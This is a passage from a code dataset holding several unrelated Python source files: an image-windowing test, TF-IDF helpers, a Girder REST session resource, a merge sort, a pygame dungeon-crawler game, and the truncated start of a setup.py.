scaler=x_scaler)\n\nprint(len(triggered_windows_small))\nprint(len(triggered_windows_medium))\nprint(len(triggered_windows_large))\n\n\nwindow_img = w.draw_boxes(img=rgb_image, bboxes=triggered_windows_small, color=(0, 255, 0), thick=6)\nwindow_img = w.draw_boxes(img=window_img, bboxes=triggered_windows_medium, color=(0, 64, 255), thick=6)\nwindow_img = w.draw_boxes(img=window_img, bboxes=triggered_windows_large, color=(255, 255, 0), thick=6)\n\nplt.title(\"Large (Yellow) and Medium (Blue) windows triggering (No filtering) - \" + file_name, fontsize=20)\n# plt.title(\"Medium (Blue) and Small (Green) windows triggering (No filtering) - \" + file_name, fontsize=20)\nplt.imshow(window_img)\nplt.show()\n","sub_path":"windowing/tests/windower_test.py","file_name":"windower_test.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"89448851","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 29 00:23:47 2019\n\n@author: morri\n\"\"\"\n\ndef getDocTFIDF(docTF,IDF):\n docTFIDF={}\n for doc in docTF:\n docTFIDF[doc]=docTF[doc]*IDF\n return docTFIDF;\n\ndef getQueryTFIDF(queryTF,IDF):\n queryTFIDF={}\n for doc in queryTF:\n queryTFIDF[doc]=queryTF[doc]*IDF\n return queryTFIDF;","sub_path":"HW3/calculateTFIDF.py","file_name":"calculateTFIDF.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"439087206","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom girder.api.rest import Resource, RestException\nfrom girder.api.rest import filtermodel, loadmodel\nfrom girder.constants import AccessType\nfrom girder.api import access\nfrom girder.api.describe import Description, describeRoute\nimport json\n\n\nclass Session(Resource):\n def initialize(self):\n self.name = 'session'\n self.exposeFields(level=AccessType.READ, fields={'_id', 'dataSet', 'ownerId'})\n\n def validate(self, session):\n return session\n\n @access.user\n @filtermodel(model='session', plugin='wt_data_manager')\n @describeRoute(\n Description('List sessions for a given user.')\n )\n def listSessions(self, params):\n user = self.getCurrentUser()\n return list(self.model('session', 'wt_data_manager').list(user=user))\n\n @access.user\n @loadmodel(model='session', plugin='wt_data_manager', level=AccessType.READ)\n @describeRoute(\n Description('Get a session by ID.')\n .param('id', 'The ID of the session.', paramType='path')\n .param('loadObjects', 'If specified, the dataSet of the returned session will contain'\n 'two additional fields for each entry: \"type\": \"folder\"|\"item\" '\n 'and \"obj\": ', paramType='query')\n .errorResponse('ID was invalid.')\n .errorResponse('Read access was denied for the session.', 403)\n )\n @filtermodel(model='session', plugin='wt_data_manager')\n def getSession(self, session, params):\n if 'loadObjects' in params:\n self.model('session', 'wt_data_manager').loadObjects(session['dataSet'])\n return session\n\n @access.user\n @loadmodel(model='session', plugin='wt_data_manager', level=AccessType.WRITE)\n @describeRoute(\n Description('Removes an existing session.')\n .param('id', 'The ID of the session.', paramType='path')\n .errorResponse('ID was invalid.')\n .errorResponse('Access was denied for the session.', 403)\n )\n def removeSession(self, session, params):\n user = self.getCurrentUser()\n return self.model('session', 'wt_data_manager').deleteSession(user, session)\n\n @access.user\n @describeRoute(\n Description('Creates a session.')\n .param('dataSet', 'An optional data set to initialize the session with. '\n 'A data set is a list of objects of the form '\n '{\"itemId\": string, \"mountPath\": string}.', paramType='query')\n )\n def createSession(self, params):\n user = self.getCurrentUser()\n dataSet = json.loads(params.get('dataSet', '[]'))\n return self.model('session', 'wt_data_manager').createSession(user, dataSet)\n\n @access.user\n @loadmodel(model='session', plugin='wt_data_manager', level=AccessType.READ)\n @describeRoute(\n Description('Get an object in a session using a path.')\n .param('id', 'The ID of the session.', paramType='path')\n .param('path', 'The path of the object, starting from the mount point.', paramType='query')\n .param('children', 'Whether to also return a listing of all the children '\n 'of the object at the specified path', paramType='query')\n .errorResponse('ID was invalid.')\n .errorResponse('Read access was denied for the session.', 403)\n .errorResponse('Object was not found.', 401)\n )\n def getObject(self, session, params):\n user = self.getCurrentUser()\n children = False\n if 'children' in params:\n children = True\n try:\n return self.model('session', 'wt_data_manager').getObject(user, session,\n params['path'], children)\n except LookupError as ex:\n raise RestException(ex.message, code=401)\n\n @access.user\n @loadmodel(model='session', plugin='wt_data_manager', level=AccessType.READ)\n @describeRoute(\n Description('Returns an unfiltered item in this session')\n .param('id', 'The ID of the session.', paramType='path')\n .param('itemId', 'The ID of the item.', paramType='path')\n .errorResponse('ID was invalid.')\n .errorResponse('Read access was denied for the session.', 403)\n .errorResponse('Object was not found.', 401)\n )\n def getItemUnfiltered(self, session, itemId, params):\n user = self.getCurrentUser()\n self.model('session', 'wt_data_manager').checkOwnership(user, session)\n item = self.model('item').load(itemId, level=AccessType.READ, user=user)\n return item\n","sub_path":"server/resources/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"281321168","text":"def merge_sort(nums):\n\n if len(nums) <= 64:\n for i in range(len(nums)):\n j = i\n while j > 0 and nums[j] < nums[j-1]:\n nums[j], nums[j - 1] = nums[j-1], nums[j]\n j = j -1\n\n return\n\n middle_item = len(nums)//2\n\n left_sub = nums[:middle_item]\n right_sub = nums[middle_item:]\n\n merge_sort(left_sub)\n merge_sort(right_sub)\n\n i = 0\n j = 0\n k = 0\n\n while i < len(left_sub) and j < len(right_sub):\n if left_sub[i] < right_sub[j]:\n nums[k] = left_sub[i]\n i = i + 1\n\n else:\n nums[k] = right_sub[j]\n j = j + 1\n\n k = k + 1\n\n\n while i < len(left_sub):\n nums[k] = left_sub[i]\n i = i + 1\n k = k + 1\n\n while j < len(right_sub):\n nums[k] = right_sub[j]\n j = j + 1\n k = k + 1\n\nif __name__ == '__main__':\n my_list = [12,5,18,-76,-74,234,167, 120, 0]\n merge_sort(my_list)\n print(my_list)","sub_path":"Sorting Algorithm/Practice Algorithms/timsort_impl.py","file_name":"timsort_impl.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"303382792","text":"import os\nimport random\nimport sys\n\nimport pygame\nimport pygame_gui\nimport pyglet\n\nwindow_size = (640, 480)\n\npygame.init()\nsize = width, height = window_size[0], window_size[1]\nscreen = pygame.display.set_mode(size)\n\n\ndef load_image(name, colorkey=None):\n fullname = os.path.join('data', name)\n if not os.path.isfile(fullname):\n print(f\"Файл с изображением '{fullname}' не найден\")\n sys.exit()\n image = pygame.image.load(fullname)\n if colorkey is not None:\n image = image.convert()\n if colorkey == -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey)\n else:\n image = image.convert_alpha()\n return image\n\n\nall_sprites = pygame.sprite.Group()\ntiles_group = pygame.sprite.Group()\nplayer_group = pygame.sprite.Group()\nboxes_group = pygame.sprite.Group()\nenemies_group = pygame.sprite.Group()\nfireballs_group = pygame.sprite.Group()\ntrap_group = pygame.sprite.Group()\n\nidle = [load_image('idle1.png'), load_image('idle2.png'),\n load_image('idle3.png')]\nrunr = [load_image('runr1.png'), load_image('runr2.png'),\n load_image('runr3.png'), load_image('runr4.png'),\n load_image('runr5.png'), load_image('runr6.png')]\nrunl = [load_image('runl1.png'), load_image('runl2.png'),\n load_image('runl3.png'), load_image('runl4.png'),\n load_image('runl5.png'), load_image('runl6.png')]\nattack_r = [load_image('attackr4.png'),\n load_image('attackr5.png'), load_image('attackr6.png')]\nattack_l = [load_image('attackl4.png'),\n load_image('attackl5.png'), load_image('attackl6.png')]\n\nenemies_images = {'slime': load_image('slime_idle1.png')}\n\nslime_idle = [load_image('slime_idle1.png'), load_image('slime_idle2.png'),\n load_image('slime_idle3.png'), load_image('slime_idle4.png'),\n load_image('slime_idle5.png'), load_image('slime_idle6.png')]\n\ndm_enemies = {'slime': load_image('dm_slime.png')}\n\ntile_images = {\n 'wall_v': load_image('wall_v.png'),\n 'wall_h': load_image('wall.png'),\n 'empty': load_image('floor.png'),\n 'box': load_image('box.png'),\n 'finish': load_image('finish.png'),\n 'trap': load_image('spikes_0.png')\n}\nplayer_image = load_image('idle1.png')\n\ntrap_sprites = [load_image('spikes_0.png'), load_image('spikes_1.png'),\n load_image('spikes_2.png'),\n load_image('spikes_3.png'),\n load_image('spikes_4.png'), load_image('spikes_5.png'),\n load_image('spikes_6.png'),\n load_image('spikes_7.png'), load_image('spikes_8.png'),\n load_image('spikes_9.png')]\n\ntile_width = tile_height = 50\n\nplayer = None\n\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\n\ndef start_screen():\n intro_text = [\"Journey of strange man\",\n \"Версия 0.5\",\n \"Правила игры\",\n \"Кничтожте всех монстроов и дойдите до конца уровня\",\n \"Для начала нажмите кнопку\"]\n\n fon = pygame.transform.scale(load_image('fon.jpg'), window_size)\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, True, (150, 0, 0))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return\n pygame.display.flip()\n\n\nclass Tile(pygame.sprite.Sprite):\n def __init__(self, tile_type, pos_x, pos_y, wall_type):\n super().__init__(tiles_group, all_sprites)\n self.image = tile_images[wall_type]\n self.true_x = pos_x * tile_width\n self.true_y = pos_y * tile_height\n self.tile_type = tile_type\n self.w = 50\n self.h = 50\n if wall_type == 'wall_v':\n self.w = 14\n self.rect = self.image.get_rect().move(\n tile_width * pos_x, tile_height * pos_y)\n\n\nclass Trap(pygame.sprite.Sprite):\n def __init__(self, tile_type, pos_x, pos_y):\n super().__init__(trap_group, all_sprites)\n self.image = pygame.transform.scale(tile_images[tile_type], (50, 50))\n self.true_x = pos_x * tile_width\n self.true_y = pos_y * tile_height\n self.tile_type = tile_type\n self.w = 50\n self.h = 50\n self.texture = 0\n self.text = 1\n self.delay = 0\n self.dm_give = False\n self.pl_stay = False\n self.dmg = 2\n active = False\n self.rect = self.image.get_rect().move(\n tile_width * pos_x, tile_height * pos_y)\n\n def next_texture(self):\n if self.delay == 9:\n self.image = pygame.transform.scale(trap_sprites[self.texture],\n (50, 50))\n self.texture += self.text\n if self.texture == 6:\n sound = pyglet.media.load('data\\sounds\\lv.mp3',\n streaming=False)\n sound.play()\n if self.texture == 10:\n self.texture = 9\n self.text = -1\n if self.texture == 0:\n self.text = 1\n self.delay = 0\n else:\n self.delay += 1\n if self.player_stay_check():\n self.pl_stay = True\n else:\n self.pl_stay = False\n if not self.pl_stay or self.texture < 6:\n self.dm_give = False\n if self.pl_stay and self.texture >= 6 and not self.dm_give:\n player.hp -= self.dmg\n self.dm_give = True\n\n def player_stay_check(self):\n player_pos_x = player.true_x\n player_pos_y = player.true_y\n if player_pos_x >= self.true_x - 25 and player_pos_x + player.w <= self.true_x + 50:\n if player_pos_y >= self.true_y - 25 and player_pos_y + player.h <= self.true_y + 50:\n return True\n else:\n return False\n else:\n return False\n\n\nclass Box(pygame.sprite.Sprite):\n def __init__(self, tile_type, pos_x, pos_y):\n super().__init__(boxes_group, all_sprites)\n self.image = tile_images[tile_type]\n self.true_x = pos_x * 50\n self.true_y = pos_y * 50\n self.w = 25\n self.h = 25\n self.broken = False\n self.tile_type = tile_type\n self.rect = self.image.get_rect().move(50 * pos_x, tile_height * pos_y)\n\n def destroy(self):\n self.image = load_image('br_box.png')\n self.broken = True\n\n\nclass Slime(pygame.sprite.Sprite):\n def __init__(self, enemy_type, pos_x, pos_y):\n super().__init__(enemies_group, all_sprites)\n self.image = enemies_images[enemy_type]\n self.true_x = pos_x * 50\n self.true_y = pos_y * 50\n self.tile_type = None\n self.dmg_delay = 0\n self.enemy_type = enemy_type\n self.rect = self.image.get_rect().move(50 * pos_x, 50 * pos_y)\n self.texture = 0\n self.point_to_move = [0, 0]\n self.target = False\n self.hp = 2\n self.dm = 3\n self.w = 16\n self.h = 15\n self.w_dm = False\n\n def next_texture(self):\n if not self.w_dm:\n self.image = slime_idle[self.texture]\n self.texture += 1\n self.texture %= 6\n else:\n self.image = dm_enemies[self.enemy_type]\n self.w_dm = False\n\n def move(self):\n move_x = 0\n move_y = 0\n if self.point_to_move[0] != 0:\n if self.point_to_move[0] > 0:\n self.rect.x += 3\n move_x = 3\n self.true_x += 3\n self.point_to_move[0] = self.point_to_move[0] - 1\n else:\n self.rect.x -= 3\n move_x = -3\n self.true_x -= 3\n self.point_to_move[0] = self.point_to_move[0] + 1\n if self.point_to_move[1] != 0:\n if self.point_to_move[1] > 0:\n self.rect.y += 3\n move_y = 3\n self.true_y += 3\n self.point_to_move[1] = self.point_to_move[1] - 1\n else:\n self.rect.y -= 3\n move_y = -3\n self.true_y -= 3\n self.point_to_move[1] = self.point_to_move[1] + 1\n self.check_target()\n self.check_dm()\n x1 = self.true_x\n y1 = self.true_y\n for elem in all_sprites:\n if elem.tile_type == 'wall' or (\n elem.tile_type == 'box' and not elem.broken):\n x2 = elem.true_x - 15\n y2 = elem.true_y - 7\n if (x2 < x1 < x2 + elem.w) or (x2 < x1 + 13 < x2 + elem.w):\n if (y2 < y1 <= y2 + elem.h) or (y2 < y1 + 13 < y2 + elem.h):\n self.point_to_move = [random.randint(-25, 25),\n random.randint(-25, 25)]\n self.rect.x -= move_x\n self.rect.y -= move_y\n self.true_x -= move_x\n self.true_y -= move_y\n if self.point_to_move[0] == 0 and self.point_to_move[1] == 0:\n self.point_to_move = [random.randint(-25, 25),\n random.randint(-25, 25)]\n\n def check_hp(self):\n if self.hp <= 0:\n self.kill()\n\n def check_target(self):\n px = player.true_x + player.w / 2\n py = player.true_y + player.h / 2\n if abs(self.true_x - px) <= 150 and abs(\n self.true_y - py) <= 150:\n self.target = True\n self.point_to_move[0] = px - self.true_x\n self.point_to_move[1] = py - self.true_y\n\n def check_dm(self):\n px = player.true_x + player.w / 2\n py = player.true_y + player.h / 2\n if self.dmg_delay == 5:\n if abs(self.true_x - px) <= 10 and abs(\n self.true_y - py) <= 10:\n player.hp -= self.dm\n print(player.hp)\n self.dmg_delay = 0\n self.dmg_delay += 1\n\n\nclass Fireball(pygame.sprite.Sprite):\n def __init__(self, x, y, true_x, true_y, nap):\n super().__init__(fireballs_group, all_sprites)\n self.true_x = true_x\n self.true_y = true_y\n self.frames = []\n self.nap = nap\n self.cut_sheet(load_image('fireballls.png'), 10, 1)\n self.texture = 0\n self.w = 10\n self.h = 25\n self.rot = 0\n self.rot = 0\n if nap[0] == 5:\n self.image = pygame.transform.rotate(self.frames[self.texture], 270)\n self.rot = 270\n elif nap[0] == -5:\n self.image = pygame.transform.rotate(self.frames[self.texture], 90)\n self.rot = 90\n elif nap[1] == 5:\n self.image = pygame.transform.rotate(self.frames[self.texture], 180)\n self.rot = 180\n else:\n self.image = self.frames[0]\n self.tile_type = 'fb'\n self.vr = False\n self.rect = self.image.get_rect().move(\n x, y)\n\n def next_texture(self):\n if not self.vr:\n self.image = pygame.transform.rotate(self.frames[self.texture],\n self.rot)\n self.texture += 1\n self.texture %= len(self.frames)\n\n def cut_sheet(self, sheet, columns, rows):\n self.rect = pygame.Rect(0, 0, sheet.get_width() // columns,\n sheet.get_height() // rows)\n for j in range(rows):\n for i in range(columns):\n frame_location = (self.rect.w * i, self.rect.h * j)\n self.frames.append(sheet.subsurface(pygame.Rect(\n frame_location, self.rect.size)))\n\n def move(self):\n self.rect.x -= self.nap[0]\n self.rect.y -= self.nap[1]\n self.true_x -= self.nap[0]\n self.true_y -= self.nap[1]\n x1 = self.true_x\n y1 = self.true_y\n for elem in all_sprites:\n if elem.tile_type != 'empty' and elem.tile_type != 'pl':\n x2 = elem.true_x\n y2 = elem.true_y\n if (x2 < x1 < x2 + elem.w) or (\n x2 < x1 + self.w < x2 + elem.w):\n if (y2 < y1 <= y2 + elem.h) or (\n y2 < y1 + self.h < y2 + elem.h):\n if elem.tile_type == None:\n elem.kill()\n elif elem.tile_type == 'box':\n elem.destroy()\n if elem.tile_type == 'box':\n if not elem.broken:\n self.kill()\n else:\n self.kill()\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__(player_group, all_sprites)\n self.true_x = pos_x * 50 + 10\n self.true_y = pos_y * 50 + 10\n self.image = player_image\n self.w = 25\n self.h = 33\n self.tile_type = 'pl'\n self.dm = 1\n self.attack_x = 0\n self.attack_y = 0\n self.fireballs_ost = 5\n self.nap = 'r'\n self.hp = 20\n self.status = 'stay'\n self.attack_end = False\n self.sound_delay = 0\n self.texture = 0\n self.rect = self.image.get_rect().move(\n 50 * pos_x + 10, 50 * pos_y + 10)\n\n def update(self, px, py):\n if px != 0 or py != 0:\n moving = True\n else:\n moving = False\n if self.status != 'attack' or (\n self.attack_end and self.status == 'attack'):\n if px != 0 or py != 0:\n self.status = 'move'\n if px > 0:\n self.nap = 'r'\n elif px < 0:\n self.nap = 'l'\n else:\n self.status = 'stay'\n self.rect.x += px\n self.rect.y += py\n self.true_y += py\n self.true_x += px\n move_y = py\n move_x = px\n x1 = self.true_x\n y1 = self.true_y\n for elem in all_sprites:\n if elem.tile_type == 'wall' or (\n elem.tile_type == 'box' and not elem.broken):\n x2 = elem.true_x - 15\n y2 = elem.true_y - 7\n if (x2 < x1 < x2 + elem.w) or (\n x2 < x1 + self.w < x2 + elem.w):\n if (y2 < y1 <= y2 + elem.h) or (\n y2 < y1 + self.h < y2 + elem.h):\n self.true_y -= move_y\n self.true_x -= move_x\n self.rect.x -= move_x\n self.rect.y -= move_y\n px = 0\n py = 0\n if self.sound_delay == 20 and moving:\n sound = pyglet.media.load('data\\sounds\\eg.mp3',\n streaming=False)\n sound.play()\n self.sound_delay = 0\n elif moving:\n self.sound_delay += 1\n\n def next_texture(self):\n if self.status == 'stay':\n self.texture %= 3\n self.image = idle[self.texture]\n self.texture += 1\n self.texture %= 3\n elif self.status == 'move':\n if self.nap == 'r':\n self.image = runr[self.texture]\n elif self.nap == 'l':\n self.image = runl[self.texture]\n self.texture += 1\n self.texture %= 6\n elif self.status == 'attack':\n self.texture %= 3\n if self.nap == 'r':\n self.image = attack_r[self.texture]\n else:\n self.image = attack_l[self.texture]\n self.texture += 1\n self.texture %= 3\n if self.texture == 0:\n self.attack_end = True\n\n def finish_check(self):\n for elem in tiles_group:\n if elem.tile_type == 'finish':\n x2 = elem.true_x - 17\n y2 = elem.true_y - 7\n x1 = self.true_x\n y1 = self.true_y\n if (x2 < x1 < x2 + elem.w) or (\n x2 < x1 + self.w < x2 + elem.w):\n if (y2 < y1 <= y2 + elem.h) or (\n y2 < y1 + self.h < y2 + elem.h):\n return True\n\n\ndef death_screen(screen):\n screen.fill((0, 0, 0))\n all_sprites = pygame.sprite.Group()\n pygame.display.flip()\n sprite = pygame.sprite.Sprite(all_sprites)\n sprite.image = load_image(\"gameover.jpg\")\n sprite.rect = sprite.image.get_rect()\n sprite.rect = (0, 1000)\n all_sprites.add(sprite)\n fps = 20\n clock = pygame.time.Clock()\n running = True\n r = True\n while running:\n screen.fill((0, 0, 0))\n all_sprites.draw(screen)\n if sprite.rect[1] != 0:\n sprite.rect = (0, sprite.rect[1] - 20)\n if sprite.rect[1] == 0:\n break\n pygame.display.flip()\n clock.tick(fps)\n main_menu(screen)\n\n\nclass Camera:\n def __init__(self):\n self.dx = 0\n self.dy = 0\n\n def apply(self, obj):\n obj.rect.x += self.dx\n obj.rect.y += self.dy\n\n def update(self, target):\n self.dx = -(target.rect.x + target.rect.w // 2 - width // 2)\n self.dy = -(target.rect.y + target.rect.h // 2 - height // 2)\n\n\ndef load_level(filename):\n filename = \"data/\" + filename\n with open(filename, 'r') as mapFile:\n level_map = [line.strip() for line in mapFile]\n\n max_width = max(map(len, level_map))\n\n return list(map(lambda x: x.ljust(max_width, '.'), level_map))\n\n\ndef generate_level(level):\n new_player, x, y = None, None, None\n for y in range(len(level)):\n for x in range(len(level[y])):\n if level[y][x] == '.':\n Tile('empty', x, y, 'empty')\n elif level[y][x] == '-':\n Tile('empty', x, y, 'empty')\n Tile('wall', x, y, 'wall_h')\n elif level[y][x] == '|':\n Tile('empty', x, y, 'empty')\n Tile('wall', x, y, 'wall_v')\n elif level[y][x] == 'T':\n Trap('trap', x, y)\n elif level[y][x] == 'b':\n Tile('empty', x, y, 'empty')\n Box('box', x, y)\n Box('box', x + 0.5, y)\n Box('box', x, y + 0.5)\n Box('box', x + 0.5, y + 0.5)\n elif level[y][x] == 's':\n Tile('empty', x, y, 'empty')\n Slime('slime', x, y)\n elif level[y][x] == 'f':\n Tile('empty', x, y, 'empty')\n Tile('finish', x, y, 'finish')\n elif level[y][x] == '@':\n Tile('empty', x, y, 'empty')\n new_player = Player(x, y)\n return new_player, x, y\n\n\ndef draw_hp(screen):\n font = pygame.font.Font(None, 50)\n text1 = font.render('hp: ' + str(player.hp), True, (100, 0, 0))\n text2 = font.render('Мана: ' + str(player.fireballs_ost), True, (0, 0, 100))\n screen.blit(text1, (0, 0))\n screen.blit(text2, (150, 0))\n\n\nstart_screen()\n\n\ndef main_menu(screen):\n global window_size\n screen.fill((100, 100, 100))\n manager = pygame_gui.UIManager(window_size)\n clock = pygame.time.Clock()\n\n start_game_btn = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect(\n (window_size[0] // 19, window_size[1] // 3.63),\n (window_size[0] // 4.75, window_size[1] // 10)),\n text='Start game',\n manager=manager\n )\n leave_game_btn = pygame_gui.elements.UIButton(\n relative_rect=pygame.Rect(\n (window_size[0] // 19, window_size[1] // 3.63 + 125),\n (window_size[0] // 4.75, window_size[1] // 10)),\n text='Leave game',\n manager=manager\n )\n fon = pygame.transform.scale(load_image('menu_fon.jpg'), window_size)\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n running = True\n while running:\n time_delta = clock.tick(60) / 1000.0\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n if event.type == pygame.USEREVENT:\n if event.user_type == pygame_gui.UI_BUTTON_PRESSED:\n if event.ui_element == start_game_btn:\n running = False\n break\n elif event.ui_element == leave_game_btn:\n exit(0)\n manager.process_events(event)\n manager.update(time_delta)\n manager.draw_ui(screen)\n pygame.display.flip()\n\n\nmain_menu(screen)\n\n# sound = pyglet.media.load('data\\music.mp3', streaming=True)\n# sound.play()\n\nmaps = ['map.txt', 'map2.txt']\nlevel = 1\ngame_end = False\n\nwhile not game_end:\n player, level_x, level_y = generate_level(load_level(maps[level - 1]))\n\n running = True\n camera = Camera()\n moving = False\n tick_move = 0\n px = 0\n br_box = load_image('br_box.png')\n py = 0\n mana_reload = 0\n win = False\n exit_g = False\n fps = 60\n tick_texture = 0\n clock = pygame.time.Clock()\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit(0)\n if event.type == pygame.KEYDOWN and event.key == pygame.K_w:\n py = -2\n player.attack_y = -40\n player.attack_x = 0\n\n elif event.type == pygame.KEYUP and event.key == pygame.K_w:\n py = 0\n if event.type == pygame.KEYDOWN and event.key == pygame.K_s:\n py = 2\n player.attack_y = 40\n player.attack_x = 0\n elif event.type == pygame.KEYUP and event.key == pygame.K_s:\n py = 0\n if event.type == pygame.KEYDOWN and event.key == pygame.K_d:\n px = 2\n player.attack_x = 40\n player.attack_y = 0\n elif event.type == pygame.KEYUP and event.key == pygame.K_d:\n px = 0\n if event.type == pygame.KEYDOWN and event.key == pygame.K_a:\n px = -2\n player.attack_x = -40\n player.attack_y = 0\n elif event.type == pygame.KEYUP and event.key == pygame.K_a:\n px = 0\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n sound = pyglet.media.load('data\\sounds\\sword.mp3',\n streaming=False)\n sound.play()\n player.status = 'attack'\n player.attack_end = False\n player.texture = 0\n x1 = player.true_x\n y1 = player.true_y\n if player.attack_x > 0:\n w = player.w + player.attack_x\n x1 = player.true_x\n else:\n x1 = player.true_x - abs(player.attack_x)\n w = player.w + abs(player.attack_x)\n if player.attack_y > 0:\n h = player.h + player.attack_y\n y1 = player.true_y\n else:\n h = player.h + abs(player.attack_y)\n y1 = player.true_y - abs(player.attack_y)\n for box in boxes_group:\n x2 = box.true_x\n y2 = box.true_y\n if (x2 <= x1 <= x2 + 25) or (x2 <= x1 + w <= x2 + 25):\n if (y2 <= y1 <= y2 + 25) or (y2 <= y1 + h <= y2 + 25):\n box.destroy()\n if (x1 <= x2 <= x1 + player.w) or (\n x1 <= x2 + box.w <= x1 + player.w):\n if (y1 <= y2 <= y1 + player.h) or (\n y1 <= y2 + box.h <= y1 + player.h):\n box.destroy()\n sound = pyglet.media.load('data\\sounds\\polomka.mp3',\n streaming=False)\n sound.play()\n for enemy in enemies_group:\n x2 = enemy.true_x\n y2 = enemy.true_y\n if (x2 <= x1 <= x2 + 20) or (x2 <= x1 + w <= x2 + 20):\n if (y2 <= y1 <= y2 + 20) or (y2 <= y1 + h <= y2 + 20):\n enemy.hp -= player.dm\n enemy.image = dm_enemies[enemy.enemy_type]\n enemy.check_hp()\n enemy.w_dm = True\n sound = pyglet.media.load('data\\sounds\\slime.mp3',\n streaming=False)\n sound.play()\n if (x1 <= x2 <= x1 + player.w) or (\n x1 <= x2 + enemy.w <= x1 + player.w):\n if (y1 <= y2 <= y1 + player.h) or (\n y1 <= y2 + enemy.h <= y1 + player.h):\n enemy.hp -= player.dm\n enemy.image = dm_enemies[enemy.enemy_type]\n enemy.check_hp()\n enemy.w_dm = True\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 3:\n if player.fireballs_ost > 0:\n sound = pyglet.media.load('data\\sounds\\magic.mp3',\n streaming=False)\n sound.play()\n if player.attack_x > 0:\n nap_x = -5\n elif player.attack_x < 0:\n nap_x = 5\n else:\n nap_x = 0\n if player.attack_y < 0:\n nap_y = 5\n elif player.attack_y > 0:\n nap_y = -5\n else:\n nap_y = 0\n if player.fireballs_ost != 0:\n Fireball(player.rect.x + player.w / 2,\n player.rect.y + player.h / 2,\n player.true_x + player.w / 2,\n player.true_y + player.h / 2, (nap_x, nap_y))\n player.fireballs_ost -= 1\n player.update(px, py)\n\n for fireball in fireballs_group:\n fireball.move()\n if tick_texture == 4:\n player.next_texture()\n for enemy in enemies_group:\n enemy.next_texture()\n enemy.move()\n for fireball in fireballs_group:\n fireball.next_texture()\n for elem in trap_group:\n elem.next_texture()\n tick_texture = 0\n if mana_reload == 500:\n if player.fireballs_ost < 5:\n player.fireballs_ost += 1\n mana_reload = 0\n camera.update(player)\n for sprite in all_sprites:\n camera.apply(sprite)\n screen.fill((100, 100, 100))\n tiles_group.draw(screen)\n boxes_group.draw(screen)\n trap_group.draw(screen)\n enemies_group.draw(screen)\n player_group.draw(screen)\n fireballs_group.draw(screen)\n draw_hp(screen)\n pygame.display.flip()\n mana_reload += 1\n tick_texture += 0.5\n clock.tick(fps)\n if player.finish_check():\n win = True\n break\n if player.hp <= 0:\n win = False\n break\n\n\n def level_end_screen():\n if win:\n intro_text = [\"Поздравляю!\",\n \"Вы прошли уровень :)\",\n \"Удачи в дальнейшем прохождении.\",\n \"Она вам понадобитца...\"]\n elif exit_g:\n intro_text = [\"Зачем закрывать игру не доиграв :(\"]\n else:\n intro_text = [\"Ничего страшного\",\n \"Получится в другой раз\"]\n fon = pygame.transform.scale(load_image('fon.jpg'), window_size)\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, True, (150, 0, 0))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return\n pygame.display.flip()\n\n\n for spr in all_sprites:\n spr.kill()\n if win:\n level += 1\n if level > len(maps):\n break\n level_end_screen()\n else:\n sound = pyglet.media.load('data\\sounds\\death.mp3', streaming=False)\n sound.play()\n death_screen(screen)\n level = 1\n\n\ndef finish_screen():\n intro_text = [\"Поздравляю!\",\n \"Вы нашли выход из подземелья\",\n \"Теперь вы можете поменять карты под себя и пройти их\",\n \"До скорых встреч в загадочных подземельях\"]\n\n fon = pygame.transform.scale(load_image('finish.jpg'), window_size)\n screen.blit(fon, (0, 0))\n font = pygame.font.Font(None, 30)\n text_coord = 50\n for line in intro_text:\n string_rendered = font.render(line, True, (150, 0, 0))\n intro_rect = string_rendered.get_rect()\n text_coord += 10\n intro_rect.top = text_coord\n intro_rect.x = 10\n text_coord += intro_rect.height\n screen.blit(string_rendered, intro_rect)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n terminate()\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return\n pygame.display.flip()\n\n\nfinish_screen()\n","sub_path":"main file.py","file_name":"main file.py","file_ext":"py","file_size_in_byte":30770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"307164014","text":"import os\nfrom setuptools import setup, Extension\nfrom setuptools.command.build_ext import build_ext\nimport sys\nimport setuptools\nimport subprocess as sp\n\n\nclass get_pybind_include(object):\n \"\"\"Helper class to determine the pybind11 include path\n\n The purpose of this class is to postpone importing pybind11\n until it is actually installed, so that the ``get_include()``\n method can be invoked. \"\"\"\n def 